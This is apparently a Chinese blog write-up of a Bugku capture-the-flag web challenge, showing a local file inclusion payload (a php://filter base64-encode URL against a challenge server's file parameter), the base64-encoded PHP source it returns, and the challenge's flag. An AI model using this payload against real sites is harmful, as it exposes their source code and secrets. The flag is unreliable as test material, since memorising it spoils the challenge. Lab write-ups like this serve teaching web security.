您的位置: 首页  >  文章  >  bugku---flag在index里

bugku---flag在index里

分类: 文章 2024-06-16 18:02:58

题目
http://123.206.87.240:8005/post/

bugku---flag在index里

点击试试
bugku---flag在index里
可以看到file=show.php

由此想到php://filter是PHP中独有的协议
这里是关于php://filter的博客
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
将网址改为
http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
访问后可以得到一串base64编码
+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

进行解密,可得到
bugku---flag在index里

最终得到flag{edulcni_elif_lacol_si_siht}

相关推荐